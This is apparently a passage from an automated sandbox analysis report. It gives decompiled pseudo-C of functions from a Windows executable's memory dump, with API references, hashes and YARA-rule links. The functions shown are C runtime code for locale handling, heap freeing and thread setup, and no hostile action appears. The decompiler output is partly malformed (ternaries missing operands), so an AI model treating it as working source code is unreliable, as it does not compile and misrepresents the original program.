																}
																if(_t174 == 0xffffffff) {
																	goto L42;
																} else {
																	_t235[1] = _t174;
																}
															}
															_t235[1] = 1;
														}
														if(_t193[1] == 0) {
															_t212 =  *_t193;
															if(_t212 == 0) {
																L52:
																 *_t193 = 0;
															} else {
																_t231 =  *( *(_t212 + 0x1c));
																if(_t231 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x2c)))) <= 0) {
																	_t170 =  *((intOrPtr*)( *_t212 + 0x18))();
																} else {
																	_t170 =  *_t231 & 0x000000ff;
																}
																if(_t170 == 0xffffffff) {
																	goto L52;
																} else {
																	_t193[1] = _t170;
																}
															}
															_t193[1] = 1;
														}
														_t209 =  *_t235;
														if(_t209 != 0) {
															if( *_t193 != 0) {
																goto L56;
															} else {
																goto L58;
															}
														} else {
															if( *_t193 != _t209) {
																L58:
																if(_t235[1] == 0) {
																	if(_t209 == 0) {
																		L66:
																		 *_t235 = 0;
																	} else {
																		_t230 =  *( *(_t209 + 0x1c));
																		if(_t230 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t209 + 0x2c)))) <= 0) {
																			_t166 =  *((intOrPtr*)( *_t209 + 0x18))();
																		} else {
																			_t166 =  *_t230 & 0x000000ff;
																		}
																		if(_t166 == 0xffffffff) {
																			goto L66;
																		} else {
																			_t235[1] = _t166;
																		}
																	}
																	_t235[1] = 1;
																}
																if( *_v72 != _t235[1]) {
																	goto L56;
																} else {
																	_t221 = _v80;
																	_t144 = 1;
																	_t202 = _v88;
																	_v89 = 1;
																}
															} else {
																L56:
																_t229 =  >=  ? _v68 :  &_v68;
																_t211 =  <  ? _v84 & 0x000000ff : 0x7f;
																_t161 = _v80;
																 *((char*)(( >=  ? _v68 :  &_v68) + _t161)) =  <  ? _v84 & 0x000000ff : 0x7f;
																_t221 = _t161;
																_t202 = _v88;
																goto L71;
															}
														}
													}
												} else {
													_t202 = _v88;
													_t177 =  >=  ? _v68 :  &_v68;
													_t237 = _t237 +  *((char*)(( >=  ? _v68 :  &_v68) + _t221));
													L71:
													_t144 = _v89;
												}
												_t221 = _t221 + 1;
												_v80 = _t221;
											} while (_t221 < _v76);
											if(_t144 != 0) {
												if(_t235[1] == 0) {
													_t208 =  *_t235;
													if(_t208 == 0) {
														L82:
														 *_t235 = 0;
													} else {
														_t227 =  *( *(_t208 + 0x1c));
														if(_t227 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t208 + 0x2c)))) <= 0) {
															_t157 =  *((intOrPtr*)( *_t208 + 0x18))();
														} else {
															_t157 =  *_t227 & 0x000000ff;
														}
														if(_t157 == 0xffffffff) {
															goto L82;
														} else {
															_t235[1] = _t157;
														}
													}
													_t235[1] = 1;
												}
												if(_t193[1] == 0) {
													_t207 =  *_t193;
													if(_t207 == 0) {
														L92:
														 *_t193 = 0;
													} else {
														_t226 =  *( *(_t207 + 0x1c));
														if(_t226 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t207 + 0x2c)))) <= 0) {
															_t153 =  *((intOrPtr*)( *_t207 + 0x18))();
														} else {
															_t153 =  *_t226 & 0x000000ff;
														}
														if(_t153 == 0xffffffff) {
															goto L92;
														} else {
															_t193[1] = _t153;
														}
													}
													_t193[1] = 1;
												}
												_t206 =  *_t235;
												if(_t206 != 0) {
													if( *_t193 != 0) {
														goto L96;
													} else {
														goto L100;
													}
												} else {
													if( *_t193 != _t206) {
														L100:
														_v84 = _v84 + 1;
														if(_t206 == 0) {
															L107:
															 *_t235 = 0;
															_t202 = _t206 | 0xffffffff;
															_t235[1] = 1;
															continue;
														} else {
															if( *( *(_t206 + 0x1c)) == 0) {
																L104:
																_t147 = ( *_t206)[0x1c]();
															} else {
																_t224 =  *((intOrPtr*)(_t206 + 0x2c));
																_t148 =  *_t224;
																if(_t148 <= 0) {
																	goto L104;
																} else {
																	 *_t224 = _t148 - 1;
																	_t206 =  *(_t206 + 0x1c);
																	_t225 =  *_t206;
																	 *_t206 =  &(_t225[1]);
																	_t147 =  *_t225 & 0x000000ff;
																}
															}
															if(_t147 == 0xffffffff) {
																goto L107;
															} else {
																_t235[1] = 0;
																_t202 = _t206 | 0xffffffff;
																continue;
															}
														}
														goto L109;
													} else {
														L96:
														_t202 = _v88;
													}
												}
											}
											break;
										}
										if(_v48 < 0x10) {
											return _t202;
										} else {
											L0030DF6A(_v68);
											return _v88;
										}
									} else {
										_t236 = _v8;
										 *0x333a50 = _t236;
										 *((intOrPtr*)( *_t236 + 4))();
										E00308645(_t236);
										goto L16;
									}
								} else {
									E00309A52( &_v16);
									return _t191;
								}
							} else {
								_t236 =  *((intOrPtr*)( *((intOrPtr*)(_t184 + 8)) + _t234 * 4));
								goto L11;
							}
						}
					}
				}
				L109:
			}

































































                                            0x00307b8e
                                            0x00307b93
                                            0x00307b99
                                            0x00307b9f
                                            0x00307ba4
                                            0x00307baa
                                            0x00307bb5
                                            0x00307bb7
                                            0x00307bbc
                                            0x00307bbd
                                            0x00307bc2
                                            0x00307bc2
                                            0x00307bca
                                            0x00307bcf
                                            0x00307bcf
                                            0x00307bd8
                                            0x00307bdd
                                            0x00307beb
                                            0x00000000
                                            0x00307bdf
                                            0x00307be2
                                            0x00307be7
                                            0x00307c4b
                                            0x00307c4e
                                            0x00307c5b
                                            0x00307be9
                                            0x00307bed
                                            0x00307bf1
                                            0x00307c03
                                            0x00307c05
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307bf3
                                            0x00307bf3
                                            0x00307bfb
                                            0x00307c07
                                            0x00307c09
                                            0x00307c30
                                            0x00307c64
                                            0x00307c72
                                            0x00307c77
                                            0x00307c78
                                            0x00307c79
                                            0x00307c7a
                                            0x00307c7b
                                            0x00307c7c
                                            0x00307c7d
                                            0x00307c7e
                                            0x00307c7f
                                            0x00307c86
                                            0x00307c8c
                                            0x00307c8e
                                            0x00307c8f
                                            0x00307c92
                                            0x00307c93
                                            0x00307c96
                                            0x00307c98
                                            0x00307ca0
                                            0x00307ca2
                                            0x00307ca4
                                            0x00307ca4
                                            0x00307ca5
                                            0x00307ca8
                                            0x00307ca9
                                            0x00307ca0
                                            0x00307cb4
                                            0x00307cb8
                                            0x00307cc0
                                            0x00307cc8
                                            0x00307ccd
                                            0x00307cd2
                                            0x00307cd5
                                            0x00307cda
                                            0x00307cdd
                                            0x00307ce5
                                            0x00307ce5
                                            0x00307ce7
                                            0x00307ceb
                                            0x00307ced
                                            0x00307cf2
                                            0x00307cfa
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307d00
                                            0x00307d00
                                            0x00307d00
                                            0x00307d03
                                            0x00307d08
                                            0x00307d0a
                                            0x00307d0c
                                            0x00307d10
                                            0x00307d14
                                            0x00307d18
                                            0x00307d1b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307d1b
                                            0x00307d1d
                                            0x00307d20
                                            0x00307d20
                                            0x00307d2c
                                            0x00307d35
                                            0x00307d54
                                            0x00307d58
                                            0x00307d5b
                                            0x00307d5f
                                            0x00307d63
                                            0x00307e8f
                                            0x00307e9b
                                            0x00307e9e
                                            0x00307ea2
                                            0x00307ea5
                                            0x00307ea7
                                            0x00307ea9
                                            0x00000000
                                            0x00307d71
                                            0x00307d75
                                            0x00307d77
                                            0x00307d7b
                                            0x00307da2
                                            0x00307da2
                                            0x00307d7d
                                            0x00307d80
                                            0x00307d84
                                            0x00307d95
                                            0x00307d8e
                                            0x00307d8e
                                            0x00307d8e
                                            0x00307d9b
                                            0x00000000
                                            0x00307d9d
                                            0x00307d9d
                                            0x00307d9d
                                            0x00307d9b
                                            0x00307da8
                                            0x00307da8
                                            0x00307db0
                                            0x00307db2
                                            0x00307db6
                                            0x00307ddd
                                            0x00307ddd
                                            0x00307db8
                                            0x00307dbb
                                            0x00307dbf
                                            0x00307dd0
                                            0x00307dc9
                                            0x00307dc9
                                            0x00307dc9
                                            0x00307dd6
                                            0x00000000
                                            0x00307dd8
                                            0x00307dd8
                                            0x00307dd8
                                            0x00307dd6
                                            0x00307de3
                                            0x00307de3
                                            0x00307de7
                                            0x00307deb
                                            0x00307e27
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307ded
                                            0x00307def
                                            0x00307e29
                                            0x00307e2d
                                            0x00307e31
                                            0x00307e58
                                            0x00307e58
                                            0x00307e33
                                            0x00307e36
                                            0x00307e3a
                                            0x00307e4b
                                            0x00307e44
                                            0x00307e44
                                            0x00307e44
                                            0x00307e51
                                            0x00000000
                                            0x00307e53
                                            0x00307e53
                                            0x00307e53
                                            0x00307e51
                                            0x00307e5e
                                            0x00307e5e
                                            0x00307e6b
                                            0x00000000
                                            0x00307e6d
                                            0x00307e6d
                                            0x00307e71
                                            0x00307e73
                                            0x00307e77
                                            0x00307e77
                                            0x00307df1
                                            0x00307df1
                                            0x00307e03
                                            0x00307e0f
                                            0x00307e12
                                            0x00307e16
                                            0x00307e19
                                            0x00307e1b
                                            0x00000000
                                            0x00307e1b
                                            0x00307def
                                            0x00307deb
                                            0x00307d37
                                            0x00307d40
                                            0x00307d44
                                            0x00307d4d
                                            0x00307ead
                                            0x00307ead
                                            0x00307ead
                                            0x00307eb1
                                            0x00307eb2
                                            0x00307eb6
                                            0x00307ec2
                                            0x00307ecc
                                            0x00307ece
                                            0x00307ed2
                                            0x00307ef9
                                            0x00307ef9
                                            0x00307ed4
                                            0x00307ed7
                                            0x00307edb
                                            0x00307eec
                                            0x00307ee5
                                            0x00307ee5
                                            0x00307ee5
                                            0x00307ef2
                                            0x00000000
                                            0x00307ef4
                                            0x00307ef4
                                            0x00307ef4
                                            0x00307ef2
                                            0x00307eff
                                            0x00307eff
                                            0x00307f07
                                            0x00307f09
                                            0x00307f0d
                                            0x00307f34
                                            0x00307f34
                                            0x00307f0f
                                            0x00307f12
                                            0x00307f16
                                            0x00307f27
                                            0x00307f20
                                            0x00307f20
                                            0x00307f20
                                            0x00307f2d
                                            0x00000000
                                            0x00307f2f
                                            0x00307f2f
                                            0x00307f2f
                                            0x00307f2d
                                            0x00307f3a
                                            0x00307f3a
                                            0x00307f3e
                                            0x00307f42
                                            0x00307f6d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307f44
                                            0x00307f46
                                            0x00307f6f
                                            0x00307f6f
                                            0x00307f75
                                            0x00307fb0
                                            0x00307fb0
                                            0x00307fb6
                                            0x00307fb9
                                            0x00000000
                                            0x00307f77
                                            0x00307f7d
                                            0x00307f9a
                                            0x00307f9c
                                            0x00307f7f
                                            0x00307f7f
                                            0x00307f82
                                            0x00307f86
                                            0x00000000
                                            0x00307f88
                                            0x00307f89
                                            0x00307f8b
                                            0x00307f8e
                                            0x00307f93
                                            0x00307f95
                                            0x00307f95
                                            0x00307f86
                                            0x00307fa2
                                            0x00000000
                                            0x00307fa4
                                            0x00307fa4
                                            0x00307fa8
                                            0x00000000
                                            0x00307fa8
                                            0x00307fa2
                                            0x00000000
                                            0x00307f48
                                            0x00307f48
                                            0x00307f48
                                            0x00307f48
                                            0x00307f46
                                            0x00307f42
                                            0x00000000
                                            0x00307ec2
                                            0x00307f51
                                            0x00307fca
                                            0x00307f53
                                            0x00307f57
                                            0x00307f69
                                            0x00307f69
                                            0x00307c32
                                            0x00307c32
                                            0x00307c37
                                            0x00307c3f
                                            0x00307c43
                                            0x00000000
                                            0x00307c48
                                            0x00307c0b
                                            0x00307c10
                                            0x00307c1d
                                            0x00307c1d
                                            0x00307bfd
                                            0x00307c00
                                            0x00000000
                                            0x00307c00
                                            0x00307bfb
                                            0x00307bf1
                                            0x00307be7
                                            0x00000000

                                            APIs
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00307B8E
                                              • Part of subcall function 003099F7: __lock.LIBCMT ref: 00309A08
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00307BAA
                                            • std::_Facet_Register.LIBCPMT ref: 00307C43
                                            • std::bad_exception::bad_exception.LIBCMT ref: 00307C64
                                              • Part of subcall function 0030D31B: std::exception::exception.LIBCMT ref: 0030D325
                                            • __CxxThrowException@8.LIBCMT ref: 00307C72
                                              • Part of subcall function 0030F4FA: RaiseException.KERNEL32(?,?,?,00301B23,00000050,00000050,?,?,?,?,?,00301B23,00000000,00000000), ref: 0030F54F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: std::_$LockitLockit::_$ExceptionException@8Facet_RaiseRegisterThrow__lockstd::bad_exception::bad_exceptionstd::exception::exception
                                            • String ID: bad cast
                                            • API String ID: 3247575091-3145022300
                                            • Opcode ID: dbdcc9edff801457575daf980980aa2631856226f5c08f84156872062095a57e
                                            • Instruction ID: 52e225ae46bb8f79a934c3fa06ddc81ac3b027412e50494cf5bc7d2a59deba36
                                            • Opcode Fuzzy Hash: dbdcc9edff801457575daf980980aa2631856226f5c08f84156872062095a57e
                                            • Instruction Fuzzy Hash: 5231D731E062189BCB17DF98D8A1A9DB7B8EF54310F1141A9E8469B6D2DB31BE41CBC0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00301250, Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00301250(signed int* __ecx, void* __esi) {
				signed int _t20;
				signed int* _t32;
				signed int* _t36;
				void* _t38;
				void* _t39;

				_t36 = __ecx;
				E00308793(__ecx);
				_t14 = _t36[0xb];
				_t39 = _t38 + 4;
				if(_t36[0xb] != 0) {
					E0030DCB0(_t14);
					_t39 = _t39 + 4;
				}
				_t36[0xb] = 0;
				_t15 = _t36[9];
				if(_t36[9] != 0) {
					E0030DCB0(_t15);
					_t39 = _t39 + 4;
				}
				_t36[9] = 0;
				_t16 = _t36[7];
				if(_t36[7] != 0) {
					E0030DCB0(_t16);
					_t39 = _t39 + 4;
				}
				_t36[7] = 0;
				_t17 = _t36[5];
				if(_t36[5] != 0) {
					E0030DCB0(_t17);
					_t39 = _t39 + 4;
				}
				_t36[5] = 0;
				_t18 = _t36[3];
				if(_t36[3] != 0) {
					E0030DCB0(_t18);
					_t39 = _t39 + 4;
				}
				_t36[3] = 0;
				_t19 = _t36[1];
				if(_t36[1] != 0) {
					E0030DCB0(_t19);
				}
				_t36[1] = 0;
				_t32 = _t36;
				_t20 =  *_t32;
				if(_t20 != 0) {
					if(_t20 < 4) {
						return E0030A980(0x331ae8 + _t20 * 0x18, 0x331ae8 + _t20 * 0x18);
					}
					return _t20;
				} else {
					return E00310BAA(0xc);
				}
			}








                                            0x00301251
                                            0x00301254
                                            0x00301259
                                            0x0030125c
                                            0x00301261
                                            0x00301264
                                            0x00301269
                                            0x00301269
                                            0x0030126c
                                            0x00301273
                                            0x00301278
                                            0x0030127b
                                            0x00301280
                                            0x00301280
                                            0x00301283
                                            0x0030128a
                                            0x0030128f
                                            0x00301292
                                            0x00301297
                                            0x00301297
                                            0x0030129a
                                            0x003012a1
                                            0x003012a6
                                            0x003012a9
                                            0x003012ae
                                            0x003012ae
                                            0x003012b1
                                            0x003012b8
                                            0x003012bd
                                            0x003012c0
                                            0x003012c5
                                            0x003012c5
                                            0x003012c8
                                            0x003012cf
                                            0x003012d4
                                            0x003012d7
                                            0x003012dc
                                            0x003012df
                                            0x003012e6
                                            0x00309a52
                                            0x00309a56
                                            0x00309a64
                                            0x00000000
                                            0x00309a74
                                            0x00309a75
                                            0x00309a58
                                            0x00309a60
                                            0x00309a60

                                            APIs
                                            • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00301254
                                              • Part of subcall function 00308793: _setlocale.LIBCMT ref: 003087AC
                                            • _free.LIBCMT ref: 00301264
                                              • Part of subcall function 0030DCB0: HeapFree.KERNEL32(00000000,00000000,?,00315EF9,00000000,00000001,00000000,00000050,00000050,?,0030D355,00309985,?), ref: 0030DCC4
                                              • Part of subcall function 0030DCB0: GetLastError.KERNEL32(00000000,?,00315EF9,00000000,00000001,00000000,00000050,00000050,?,0030D355,00309985,?), ref: 0030DCD6
                                            • _free.LIBCMT ref: 0030127B
                                            • _free.LIBCMT ref: 00301292
                                            • _free.LIBCMT ref: 003012A9
                                            • _free.LIBCMT ref: 003012C0
                                            • _free.LIBCMT ref: 003012D7
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                            • String ID:
                                            • API String ID: 3515823920-0
                                            • Opcode ID: d484f50abc1ca39ea4ac9698ec28f268951ac31c67e0882bfdf98ccc0c8ab19b
                                            • Instruction ID: 990b6530b4b70f4f535730810bcbf52e9d6dbd34980d4034fa0c9b1d576775fb
                                            • Opcode Fuzzy Hash: d484f50abc1ca39ea4ac9698ec28f268951ac31c67e0882bfdf98ccc0c8ab19b
                                            • Instruction Fuzzy Hash: 9901EDF4A427004BEB21EF65E829B1772EC5F10714F044928E84ACB6C2F6B5E918CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00315FBD, Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 91%
                                            			E00315FBD(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E0030E1CF(_t3);
				if(E00310B71() != 0) {
					_t6 = E0031216C(E00315D4C);
					 *0x32e8c4 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E00311C7D(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E00316033();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E003121C8( *0x32e8c4, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E00315F08(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E00316033();
					return 0;
				}
			}








                                            0x00315fbd
                                            0x00315fc9
                                            0x00315fd8
                                            0x00315fdd
                                            0x00315fe3
                                            0x00315fe6
                                            0x00000000
                                            0x00315fe8
                                            0x00315ff5
                                            0x00315ff9
                                            0x00315ffb
                                            0x0031602a
                                            0x0031602a
                                            0x0031602f
                                            0x00316032
                                            0x00315ffd
                                            0x0031600b
                                            0x0031600d
                                            0x00000000
                                            0x0031600f
                                            0x0031600f
                                            0x00316011
                                            0x00316012
                                            0x00316019
                                            0x0031601f
                                            0x00316023
                                            0x00316027
                                            0x00316029
                                            0x00316029
                                            0x0031600d
                                            0x00315ffb
                                            0x00315fcb
                                            0x00315fcb
                                            0x00315fcb
                                            0x00315fd2
                                            0x00315fd2

                                            APIs
                                              • Part of subcall function 0030E1CF: EncodePointer.KERNEL32(00000000,?,00315FC2,0030E47F,0032CCA8,00000014,00000051,0032CB98,00000050,00000001), ref: 0030E1D2
                                              • Part of subcall function 0030E1CF: __initp_misc_winsig.LIBCMT ref: 0030E1ED
                                              • Part of subcall function 0030E1CF: GetModuleHandleW.KERNEL32(kernel32.dll,00000050), ref: 00312282
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00312296
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003122A9
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003122BC
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003122CF
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003122E2
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 003122F5
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00312308
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0031231B
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0031232E
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00312341
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00312354
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00312367
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0031237A
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0031238D
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003123A0
                                            • __mtinitlocks.LIBCMT ref: 00315FC2
                                            • __mtterm.LIBCMT ref: 00315FCB
                                            • __calloc_crt.LIBCMT ref: 00315FF0
                                            • __initptd.LIBCMT ref: 00316012
                                            • GetCurrentThreadId.KERNEL32 ref: 00316019
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AddressProc$CurrentEncodeHandleModulePointerThread__calloc_crt__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                            • String ID:
                                            • API String ID: 2364961035-0
                                            • Opcode ID: c6949f0eae8b231a4e1e409772cc2f82b7d7201b879ed12782b7206fda2b8805
                                            • Instruction ID: 45d5fd4af11330eb75c3cf3a9784647a78441553e0199bade6c73a5916b79163
                                            • Opcode Fuzzy Hash: c6949f0eae8b231a4e1e409772cc2f82b7d7201b879ed12782b7206fda2b8805
                                            • Instruction Fuzzy Hash: A3F0CD3214DB2199E23F77B47C036CA2AC89F4DB71F210A29F4A1D81D1EE6084C20190
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00309A84, Relevance: 9.0, APIs: 6, Instructions: 38COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 57%
                                            			E00309A84(void* __edx, void* __edi, intOrPtr* _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				void* _t20;
				void* _t22;
				void* _t24;
				void* _t26;
				intOrPtr* _t27;
				void* _t30;

				_t25 = __edi;
				_t24 = __edx;
				_t11 = E0030E586(__edi, _t26, _t30);
				_t27 = _a4;
				 *_t27 = _t11;
				_t12 = E00311C7D(0x100, 2);
				 *((intOrPtr*)(_t27 + 4)) = _t12;
				_pop(_t22);
				_t31 = _t12;
				if(_t12 == 0) {
					_t13 = E00311999(_t20, _t24, _t27, __eflags);
					_t5 = _t27 + 8;
					 *_t5 =  *(_t27 + 8) & 0x00000000;
					__eflags =  *_t5;
					 *((intOrPtr*)(_t27 + 4)) = _t13;
				} else {
					E0030EE10( *((intOrPtr*)(_t27 + 4)), E00311999(_t20, _t24, _t27, _t31), 0x200);
					 *(_t27 + 8) = 1;
				}
				_t15 =  *((intOrPtr*)(E0030E5AC(_t25, _t27, _t31) + 4));
				 *((intOrPtr*)(_t27 + 0xc)) = _t15;
				if(_t15 != 0) {
					_push(_t15);
					 *((intOrPtr*)(_t27 + 0xc)) = E003119C2(_t22, _t24);
				}
				return _t27;
			}















                                            0x00309a84
                                            0x00309a84
                                            0x00309a88
                                            0x00309a8d
                                            0x00309a97
                                            0x00309a99
                                            0x00309a9e
                                            0x00309aa2
                                            0x00309aa3
                                            0x00309aa5
                                            0x00309ac6
                                            0x00309acb
                                            0x00309acb
                                            0x00309acb
                                            0x00309acf
                                            0x00309aa7
                                            0x00309ab5
                                            0x00309abd
                                            0x00309abd
                                            0x00309ad7
                                            0x00309ada
                                            0x00309adf
                                            0x00309ae1
                                            0x00309ae8
                                            0x00309ae8
                                            0x00309aef

                                            APIs
                                            • ____lc_codepage_func.LIBCMT ref: 00309A88
                                            • __calloc_crt.LIBCMT ref: 00309A99
                                              • Part of subcall function 00311C7D: __calloc_impl.LIBCMT ref: 00311C8C
                                            • ___pctype_func.LIBCMT ref: 00309AAC
                                            • _memmove.LIBCMT ref: 00309AB5
                                            • ___pctype_func.LIBCMT ref: 00309AC6
                                            • ____lc_locale_name_func.LIBCMT ref: 00309AD2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ___pctype_func$____lc_codepage_func____lc_locale_name_func__calloc_crt__calloc_impl_memmove
                                            • String ID:
                                            • API String ID: 1321936363-0
                                            • Opcode ID: 85ead9b2c1753dc2829ddbb7895ea7922a1a5c43861ad33f92507f41e68818b1
                                            • Instruction ID: 5853648ee34077e920e026fbbc4a5f97d22b1599905ac8e9fdfdc66ee7a67aa8
                                            • Opcode Fuzzy Hash: 85ead9b2c1753dc2829ddbb7895ea7922a1a5c43861ad33f92507f41e68818b1
                                            • Instruction Fuzzy Hash: 1CF096B1A057055FD722AF65D826B96B7D89F04750F00CC2EF5699F5C2EB74E4808B90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 003011C0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 86%
                                            			E003011C0(void* __ecx, void* __esi, char* _a4) {
				char _v16;
				char* _t33;
				signed int _t39;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				void* _t58;
				signed int* _t60;
				signed int* _t61;
				void* _t64;
				void* _t66;
				signed int* _t67;
				void* _t73;
				void* _t74;
				void* _t75;

				_t74 = _t73 - 0xc;
				_t66 = __ecx;
				E003099F7(__ecx, 0);
				 *(__ecx + 4) = 0;
				 *((char*)(__ecx + 8)) = 0;
				 *(__ecx + 0xc) = 0;
				 *((char*)(__ecx + 0x10)) = 0;
				 *((short*)(__ecx + 0x18)) = 0;
				 *(__ecx + 0x14) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((short*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((char*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((char*)(__ecx + 0x30)) = 0;
				_t33 = _a4;
				_t79 = _t33;
				if(_t33 == 0) {
					_a4 = "bad locale name";
					_t60 =  &_v16;
					E0030D337(_t60,  &_a4);
					_v16 = 0x326018;
					E0030F4FA( &_v16, 0x32d2bc);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t66);
					_t67 = _t60;
					E00308793(_t67);
					_t39 = _t67[0xb];
					_t75 = _t74 + 4;
					__eflags = _t39;
					if(_t39 != 0) {
						E0030DCB0(_t39);
						_t75 = _t75 + 4;
					}
					_t67[0xb] = 0;
					_t40 = _t67[9];
					__eflags = _t40;
					if(_t40 != 0) {
						E0030DCB0(_t40);
						_t75 = _t75 + 4;
					}
					_t67[9] = 0;
					_t41 = _t67[7];
					__eflags = _t41;
					if(_t41 != 0) {
						E0030DCB0(_t41);
						_t75 = _t75 + 4;
					}
					_t67[7] = 0;
					_t42 = _t67[5];
					__eflags = _t42;
					if(_t42 != 0) {
						E0030DCB0(_t42);
						_t75 = _t75 + 4;
					}
					_t67[5] = 0;
					_t43 = _t67[3];
					__eflags = _t43;
					if(_t43 != 0) {
						E0030DCB0(_t43);
						_t75 = _t75 + 4;
					}
					_t67[3] = 0;
					_t44 = _t67[1];
					__eflags = _t44;
					if(_t44 != 0) {
						E0030DCB0(_t44);
					}
					_t67[1] = 0;
					_t61 = _t67;
					_t45 =  *_t61;
					__eflags = _t45;
					if(_t45 != 0) {
						__eflags = _t45 - 4;
						if(_t45 < 4) {
							_t47 = 0x331ae8 + _t45 * 0x18;
							__eflags = 0x331ae8 + _t45 * 0x18;
